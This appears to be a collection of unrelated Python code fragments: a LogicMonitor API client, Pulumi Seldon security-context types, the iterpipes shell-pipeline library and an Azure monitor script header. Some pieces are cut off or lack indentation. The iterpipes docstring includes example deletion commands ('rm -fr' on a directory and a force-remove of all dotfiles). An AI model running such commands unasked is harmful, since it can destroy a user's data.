for ii, al in enumerate(ll):
data[ii, 1] = al.Defficiency()
data[ii, 2] = al.VIFefficiency()
data[ii, 3] = al.Eefficiency()
alxf = oalib.array2xf(al)
data[ii, 0] = alxf.rank()
gma = np.zeros((len(ll), ll[0].n_columns | |
query_params.append(('format', params['format'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Website', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_checkpoint_data_by_id(self, srv_id, check_id, **kwargs): # noqa: E501
"""get data for a website checkpoint # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_checkpoint_data_by_id(srv_id, check_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int srv_id: (required)
:param int check_id: (required)
:param float period:
:param int start:
:param int end:
:param str datapoints:
:param str format:
:return: WebsiteCheckpointRawData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_website_checkpoint_data_by_id_with_http_info(srv_id, check_id, **kwargs) # noqa: E501
else:
(data) = self.get_website_checkpoint_data_by_id_with_http_info(srv_id, check_id, **kwargs) # noqa: E501
return data
def get_website_checkpoint_data_by_id_with_http_info(self, srv_id, check_id, **kwargs):  # noqa: E501
    """get data for a website checkpoint  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_checkpoint_data_by_id_with_http_info(srv_id, check_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int srv_id: (required)
    :param int check_id: (required)
    :param float period:
    :param int start:
    :param int end:
    :param str datapoints:
    :param str format:
    :return: WebsiteCheckpointRawData
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['srv_id', 'check_id', 'period', 'start', 'end', 'datapoints', 'format']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fold keyword arguments into params, rejecting unknown names early.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_website_checkpoint_data_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'srv_id' is set
    if ('srv_id' not in params or
            params['srv_id'] is None):
        raise ValueError("Missing the required parameter `srv_id` when calling `get_website_checkpoint_data_by_id`")  # noqa: E501
    # verify the required parameter 'check_id' is set
    if ('check_id' not in params or
            params['check_id'] is None):
        raise ValueError("Missing the required parameter `check_id` when calling `get_website_checkpoint_data_by_id`")  # noqa: E501

    # Bug fix: the regex patterns (and the messages that embed them) are raw
    # strings now -- '\d' in a plain literal is an invalid escape sequence
    # (DeprecationWarning, and a SyntaxWarning on modern Python).  Runtime
    # text is unchanged.  isinstance replaces `type(...) is str`.
    if 'srv_id' in params and not re.search(r'\d+', params['srv_id'] if isinstance(params['srv_id'], str) else str(params['srv_id'])):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `srv_id` when calling `get_website_checkpoint_data_by_id`, must conform to the pattern `/\d+/`")  # noqa: E501
    if 'check_id' in params and not re.search(r'\d+', params['check_id'] if isinstance(params['check_id'], str) else str(params['check_id'])):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `check_id` when calling `get_website_checkpoint_data_by_id`, must conform to the pattern `/\d+/`")  # noqa: E501

    collection_formats = {}

    # Substitute the validated ids into the URL template.
    path_params = {}
    if 'srv_id' in params:
        path_params['srvId'] = params['srv_id']  # noqa: E501
    if 'check_id' in params:
        path_params['checkId'] = params['check_id']  # noqa: E501

    # Only explicitly supplied optional arguments become query parameters.
    query_params = []
    if 'period' in params:
        query_params.append(('period', params['period']))  # noqa: E501
    if 'start' in params:
        query_params.append(('start', params['start']))  # noqa: E501
    if 'end' in params:
        query_params.append(('end', params['end']))  # noqa: E501
    if 'datapoints' in params:
        query_params.append(('datapoints', params['datapoints']))  # noqa: E501
    if 'format' in params:
        query_params.append(('format', params['format']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['LMv1']  # noqa: E501

    return self.api_client.call_api(
        '/website/websites/{srvId}/checkpoints/{checkId}/data', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='WebsiteCheckpointRawData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_website_data_by_graph_name(self, id, graph_name, **kwargs):  # noqa: E501
    """get website data by graph name  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_data_by_graph_name(id, graph_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str graph_name: (required)
    :param int start:
    :param int end:
    :param str format:
    :return: GraphPlot
             If the method is called asynchronously,
             returns the request thread.
    """
    # Request only the deserialized body; the _with_http_info variant
    # returns either the data (sync) or the request thread (async_req=True),
    # and both paths just pass that result straight through.
    kwargs['_return_http_data_only'] = True
    return self.get_website_data_by_graph_name_with_http_info(
        id, graph_name, **kwargs)  # noqa: E501
def get_website_data_by_graph_name_with_http_info(self, id, graph_name, **kwargs):  # noqa: E501
    """get website data by graph name  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_data_by_graph_name_with_http_info(id, graph_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str graph_name: (required)
    :param int start:
    :param int end:
    :param str format:
    :return: GraphPlot
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'graph_name', 'start', 'end', 'format']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fold keyword arguments into params, rejecting unknown names early.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_website_data_by_graph_name" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_website_data_by_graph_name`")  # noqa: E501
    # verify the required parameter 'graph_name' is set
    if ('graph_name' not in params or
            params['graph_name'] is None):
        raise ValueError("Missing the required parameter `graph_name` when calling `get_website_data_by_graph_name`")  # noqa: E501

    # Bug fix: patterns (and messages embedding them) are raw strings now --
    # '\d' in a plain literal is an invalid escape sequence on modern
    # Python.  Runtime text unchanged; isinstance replaces `type(...) is str`.
    if 'id' in params and not re.search(r'\d+', params['id'] if isinstance(params['id'], str) else str(params['id'])):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `id` when calling `get_website_data_by_graph_name`, must conform to the pattern `/\d+/`")  # noqa: E501
    if 'graph_name' in params and not re.search(r'.+', params['graph_name'] if isinstance(params['graph_name'], str) else str(params['graph_name'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `graph_name` when calling `get_website_data_by_graph_name`, must conform to the pattern `/.+/`")  # noqa: E501

    collection_formats = {}

    # Substitute the validated values into the URL template.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501
    if 'graph_name' in params:
        path_params['graphName'] = params['graph_name']  # noqa: E501

    # Only explicitly supplied optional arguments become query parameters.
    query_params = []
    if 'start' in params:
        query_params.append(('start', params['start']))  # noqa: E501
    if 'end' in params:
        query_params.append(('end', params['end']))  # noqa: E501
    if 'format' in params:
        query_params.append(('format', params['format']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['LMv1']  # noqa: E501

    return self.api_client.call_api(
        '/website/websites/{id}/graphs/{graphName}/data', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GraphPlot',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_website_graph_data(self, website_id, checkpoint_id, graph_name, **kwargs):  # noqa: E501
    """get website graph data  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_graph_data(website_id, checkpoint_id, graph_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int website_id: (required)
    :param int checkpoint_id: (required)
    :param str graph_name: (required)
    :param int start:
    :param int end:
    :param str format:
    :return: GraphPlot
             If the method is called asynchronously,
             returns the request thread.
    """
    # Request only the deserialized body; the _with_http_info variant
    # returns either the data (sync) or the request thread (async_req=True),
    # and both paths just pass that result straight through.
    kwargs['_return_http_data_only'] = True
    return self.get_website_graph_data_with_http_info(
        website_id, checkpoint_id, graph_name, **kwargs)  # noqa: E501
def get_website_graph_data_with_http_info(self, website_id, checkpoint_id, graph_name, **kwargs): # noqa: E501
"""get website graph data # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_graph_data_with_http_info(website_id, checkpoint_id, graph_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int website_id: (required)
:param int checkpoint_id: (required)
:param str graph_name: (required)
:param int start:
:param int end:
:param str format:
:return: GraphPlot
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['website_id', 'checkpoint_id', 'graph_name', 'start', 'end', 'format'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_website_graph_data" % key
)
| |
will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
if allow_privilege_escalation is not None:
pulumi.set(__self__, "allow_privilege_escalation", allow_privilege_escalation)
if capabilities is not None:
pulumi.set(__self__, "capabilities", capabilities)
if privileged is not None:
pulumi.set(__self__, "privileged", privileged)
if proc_mount is not None:
pulumi.set(__self__, "proc_mount", proc_mount)
if read_only_root_filesystem is not None:
pulumi.set(__self__, "read_only_root_filesystem", read_only_root_filesystem)
if run_as_group is not None:
pulumi.set(__self__, "run_as_group", run_as_group)
if run_as_non_root is not None:
pulumi.set(__self__, "run_as_non_root", run_as_non_root)
if run_as_user is not None:
pulumi.set(__self__, "run_as_user", run_as_user)
if se_linux_options is not None:
pulumi.set(__self__, "se_linux_options", se_linux_options)
if windows_options is not None:
pulumi.set(__self__, "windows_options", windows_options)
@property
@pulumi.getter(name="allowPrivilegeEscalation")
def allow_privilege_escalation(self) -> Optional[bool]:
    """
    AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "allow_privilege_escalation")
@property
@pulumi.getter
def capabilities(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextCapabilities']:
    """
    The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "capabilities")
@property
@pulumi.getter
def privileged(self) -> Optional[bool]:
    """
    Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "privileged")
@property
@pulumi.getter(name="procMount")
def proc_mount(self) -> Optional[str]:
    """
    procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "proc_mount")
@property
@pulumi.getter(name="readOnlyRootFilesystem")
def read_only_root_filesystem(self) -> Optional[bool]:
    """
    Whether this container has a read-only root filesystem. Default is false.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "read_only_root_filesystem")
@property
@pulumi.getter(name="runAsGroup")
def run_as_group(self) -> Optional[int]:
    """
    The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "run_as_group")
@property
@pulumi.getter(name="runAsNonRoot")
def run_as_non_root(self) -> Optional[bool]:
    """
    Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "run_as_non_root")
@property
@pulumi.getter(name="runAsUser")
def run_as_user(self) -> Optional[int]:
    """
    The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "run_as_user")
@property
@pulumi.getter(name="seLinuxOptions")
def se_linux_options(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextSeLinuxOptions']:
    """
    The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "se_linux_options")
@property
@pulumi.getter(name="windowsOptions")
def windows_options(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextWindowsOptions']:
    """
    The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    # Accessor backed by pulumi.get; __init__ stores this field only when a
    # value was provided, so the result is presumably None when unset.
    return pulumi.get(self, "windows_options")
def _translate_property(self, prop):
    # Map a camelCase wire name to its snake_case attribute; names without a
    # table entry pass through unchanged.
    return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextCapabilities(dict):
    """
    The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
    """
    def __init__(__self__, *,
                 add: Optional[Sequence[str]] = None,
                 drop: Optional[Sequence[str]] = None):
        """
        The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
        :param Sequence[str] add: Added capabilities
        :param Sequence[str] drop: Removed capabilities
        """
        # Record only the fields that were explicitly supplied.
        for key, value in (("add", add), ("drop", drop)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter
    def add(self) -> Optional[Sequence[str]]:
        """Added capabilities"""
        return pulumi.get(self, "add")

    @property
    @pulumi.getter
    def drop(self) -> Optional[Sequence[str]]:
        """Removed capabilities"""
        return pulumi.get(self, "drop")

    def _translate_property(self, prop):
        # Names without a snake_case mapping pass through unchanged.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextSeLinuxOptions(dict):
    """
    The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    def __init__(__self__, *,
                 level: Optional[str] = None,
                 role: Optional[str] = None,
                 type: Optional[str] = None,
                 user: Optional[str] = None):
        """
        The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
        :param str level: Level is SELinux level label that applies to the container.
        :param str role: Role is a SELinux role label that applies to the container.
        :param str type: Type is a SELinux type label that applies to the container.
        :param str user: User is a SELinux user label that applies to the container.
        """
        # Record only the labels that were explicitly supplied.
        for key, value in (("level", level), ("role", role),
                           ("type", type), ("user", user)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter
    def level(self) -> Optional[str]:
        """Level is SELinux level label that applies to the container."""
        return pulumi.get(self, "level")

    @property
    @pulumi.getter
    def role(self) -> Optional[str]:
        """Role is a SELinux role label that applies to the container."""
        return pulumi.get(self, "role")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """Type is a SELinux type label that applies to the container."""
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def user(self) -> Optional[str]:
        """User is a SELinux user label that applies to the container."""
        return pulumi.get(self, "user")

    def _translate_property(self, prop):
        # Names without a snake_case mapping pass through unchanged.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextWindowsOptions(dict):
    """
    The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
    """
    def __init__(__self__, *,
                 gmsa_credential_spec: Optional[str] = None,
                 gmsa_credential_spec_name: Optional[str] = None,
                 run_as_user_name: Optional[str] = None):
        """
        The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
        :param str gmsa_credential_spec: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field.
        :param str gmsa_credential_spec_name: GMSACredentialSpecName is the name of the GMSA credential spec to use.
        :param str run_as_user_name: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
        """
        # Record only the fields that were explicitly supplied.
        for key, value in (
                ("gmsa_credential_spec", gmsa_credential_spec),
                ("gmsa_credential_spec_name", gmsa_credential_spec_name),
                ("run_as_user_name", run_as_user_name)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter(name="gmsaCredentialSpec")
    def gmsa_credential_spec(self) -> Optional[str]:
        """GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field."""
        return pulumi.get(self, "gmsa_credential_spec")

    @property
    @pulumi.getter(name="gmsaCredentialSpecName")
    def gmsa_credential_spec_name(self) -> Optional[str]:
        """GMSACredentialSpecName is the name of the GMSA credential spec to use."""
        return pulumi.get(self, "gmsa_credential_spec_name")

    @property
    @pulumi.getter(name="runAsUserName")
    def run_as_user_name(self) -> Optional[str]:
        """The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence."""
        return pulumi.get(self, "run_as_user_name")

    def _translate_property(self, prop):
        # Names without a snake_case mapping pass through unchanged.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersStartupProbe(dict):
"""
StartupProbe indicates that the Pod | |
<reponame>kelleyk/py3k-iterpipes
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2010 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''A library for running shell pipelines using shell-like syntax.
Rationale
---------
Python is a good choice for many software tools, but it lacks clarity and
simplicity of command shells when it comes to running command pipelines from
scripts. The standard [subprocess][] module provides basic inter-processing
tools, but it requires lots of lines to express a single shell line.
`iterpipes` is trying to overcome this limitation by representing a shell
command pipeline as *a function over iterables*, similar to functions from the
standard [itertools][] module.
Description
-----------
`iterpipes` is a thin wrapper around the standard [subprocess][] module. It
represents a shell command pipeline as a function over iterables that maps its
`stdin` to `stdout`. As `iterpipes` deals with iterables, it plays nicely with
[itertools][] from the standard library, as well as with list comprehensions and
generator expressions.
To invoke a shell command pipeline, you should:
1. Create it using a command constructor
2. Execute it directly or via a helper function
### Command Constructors
Commands are created using command constructors. Command constructors take a
string `command` to run as their first argument. Special values `'{}'` in the
`command` are replaced with constructors' positional arguments using *safe shell
escaping*.
Keyword arguments of constructors are almost identical to the keyword arguments
of `subprocess.Popen` from [subprocess][]. This allows redirecting `stdout` to a
file, merging `stdout` and `stderr`, etc.
Here are several examples for using command constructors:
cmd('rm -fr {}', dirname)
linecmd('find {} -name {} -print0 | xargs -0 wc -l',
        dirname,
        '\*.py')
cmd(r'ls -d .* | tr \n \0 | xargs -0 rm -f')
Command constructors summary:
* `bincmd`:
a binary command, that works with `str` iterables
* `cmd`:
a string command, that works with `unicode` iterables and performs necessary
encoding conversions
* `linecmd`:
a line-oriented command, that returns buffered `unicode` lines delimited by
the newline character `'\n'`
### Execution Helpers
As a command is an ordinary function over iterables, you can run it by passing
an `stdin` iterable as its `input` and iterating over its `stdout` result:
for line in linecmd('gunzip | head')(zipped_data):
print(line.rstrip('\\n'))
If a command returns a non-zero code, then the `CalledProcessError` exception is
raised.
It is often the case that a command doesn't require any `stdin` data or doesn't
write anything useful to `stdout`. There are several helper functions for such
cases.
If a command doesn't need any `stdin` data, you may run it using `None` or `[]`
as its `input` or use the `run` helper function to get a little bit more
readable syntax:
for line in run(linecmd('ls -a')):
print(line.rstrip('\\n'))
If a command delivers no useful data to `stdout`, then you may use `call` or
`check_call` helpers. If you need a return code of the command, use the `call`
helper:
retcode = call(cmd('rm -f {}', filename))
otherwise use the `check_call` helper that raises `CalledProcessError` on errors:
check_call(cmd('rm -f {}', filename))
Execution helpers summary:
* `run`:
run a command with `None` as the default `input` value
* `call`:
run a command and return its return code
* `check_call`:
run a command and raise an exception if it returned a non-zero code
All the execution helpers accept `input` as their second argument. The default
value for `input` is `None`.
### Other Functions
* `format`:
format a shell command using safe escapes and argument substitutions
* `compose`:
function composition from the functional programming world
Examples
--------
It is useful to abstract the execution of a command using a Python function. For
example, you may find yourself writing several lines of code for creating
tarball archives of directories. You can hide details of creating tarballs by
defining the following function:
def make_zipped_tarball(dirname, output_path='.'):
name = os.path.basename(os.path.normpath(dirname))
tar = cmd('tar -czf {} {}',
os.path.join(output_path, '%s.tar.gz' % name),
dirname)
check_call(tar)
[subprocess]: http://docs.python.org/library/subprocess.html
[itertools]: http://docs.python.org/library/itertools.html
'''
from __future__ import with_statement
from contextlib import contextmanager
import re, errno, locale
from subprocess import Popen, PIPE, CalledProcessError
from threading import Thread
from codecs import iterdecode
from functools import reduce
import six
__all__ = [
'cmd', 'bincmd', 'linecmd', 'run', 'call', 'check_call', 'format',
'compose',
]
DEFAULT_READ_BUFSIZE = 4096
def bincmd(command, *args, **kwargs):
    '''Create a binary command.

    Arguments:

    * `command`:
      a shell pipeline string; each `'{}'` placeholder is replaced with the
      corresponding positional argument using safe shell escaping

    The keyword arguments are identical to the keyword arguments of
    `subprocess.Popen`.

    Return value:

    A binary command operating on `str` iterables: a function mapping an
    `stdin` iterable to an `stdout` iterable. It also accepts a single
    `str` value or `None`.
    '''
    opts = dict(kwargs)
    if 'stdout' not in opts:
        opts['stdout'] = PIPE
    # `format` here is this module's shell-escaping formatter (see __all__),
    # not the builtin.
    formatted = format(command, args)

    def pipeline(input):
        return _run_pipeline(formatted, input, **opts)

    return pipeline
def cmd(command, *args, **kwargs):
    '''Create a string command.

    It is an extension of `bincmd` that performs necessary encoding conversions
    for `unicode` values.

    Arguments:

    * `command`:
      a shell pipeline string. Special `'{}'` values in `command` are replaced
      with positional arguments using safe shell escaping

    Keyword arguments:

    * `encoding`:
      a string encoding for `unicode` values. If not specified, the
      locale-specific encoding will be used

    The other keyword arguments are identical to the keyword arguments of
    `subprocess.Popen`.

    Return value:

    A string command that works with `unicode` iterables and performs necessary
    encoding conversions. It is a function from `stdin` iterable to `stdout`
    iterable. It also may accept a single `unicode` value or `None`.
    '''
    kwargs = kwargs.copy()
    # Pull the text encoding out of kwargs so it is not forwarded to Popen;
    # pop(default) replaces the original setdefault-then-pop dance.
    encoding = kwargs.pop('encoding', locale.getpreferredencoding())

    def decode(xs):
        return iterdecode(xs, encoding)

    def encode(xs):
        # Bug fix: the original tested `isinstance(input, ...)`, which named
        # the `input` *builtin* (always False), so a single text value fell
        # through to the generic branch and was encoded character by
        # character instead of as one chunk.
        if isinstance(xs, six.text_type):
            return [xs.encode(encoding)]
        elif xs is None:
            return xs
        else:
            return (x.encode(encoding) for x in xs)

    return compose(decode, bincmd(command, *args, **kwargs), encode)
def linecmd(command, *args, **kwargs):
    r'''Create a line-oriented command.

    It is an extension of `cmd` that yields buffered `unicode` lines.

    Arguments:

    * `command`:
      a shell pipeline string; each `'{}'` placeholder is replaced with the
      corresponding positional argument using safe shell escaping

    Keyword arguments:

    * `encoding`:
      a string encoding for `unicode` values. If not specified, the
      locale-specific encoding will be used

    The other keyword arguments are identical to the keyword arguments of
    `subprocess.Popen`.

    Return value:

    A line-oriented command producing buffered `unicode` lines delimited by
    the newline character `'\n'`. It works with `unicode` iterables and
    performs necessary encoding conversions. It is a function from `stdin`
    iterable to `stdout` iterable, and also accepts a single `unicode`
    value or `None`.
    '''
    # Force line buffering; any caller-supplied bufsize is overridden,
    # exactly as in `kwargs['bufsize'] = 1`.
    opts = dict(kwargs, bufsize=1)
    return cmd(command, *args, **opts)
def run(cmd, input=None):
    '''Run a command, defaulting its `input` to `None`.

    If the process running `cmd` returns a non-zero code, then a
    `CalledProcessError` is raised.

    Arguments:

    * `cmd`:
      a command to run. It is a function over iterables.
    * `input`:
      the `stdin` data. It may be an iterable, a single value or `None`.

    The return value is the `cmd`'s resulting `stdout` iterable.
    '''
    # A command is just a function over iterables; running it is applying it.
    result = cmd(input)
    return result
def call(cmd, input=None):
    '''Run a command and return its return code.

    Arguments:

    * `cmd`:
      a command to run. It is a function over iterables.
    * `input`:
      the `stdin` data. It may be an iterable, a single value or `None`.

    The return value is the return code of the process running `cmd`.
    '''
    # Execute the command, then extract the exit status of its process.
    output = run(cmd, input)
    return _retcode(output)
def check_call(cmd, input=None):
'''Run a command and raise an exception if it returned a non-zero code.
If the process running `cmd` returns a non-zero code, then a
`CalledProcessError` is raised.
Arguments:
* `cmd`:
a command to | |
#!/usr/bin/python
# Copyright 2013 MS Open Tech
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#check_azure_compute.py: Azure compute monitor script
import argparse
import exceptions
import logging
import os
import pyodbc
import sys
from datetime import datetime
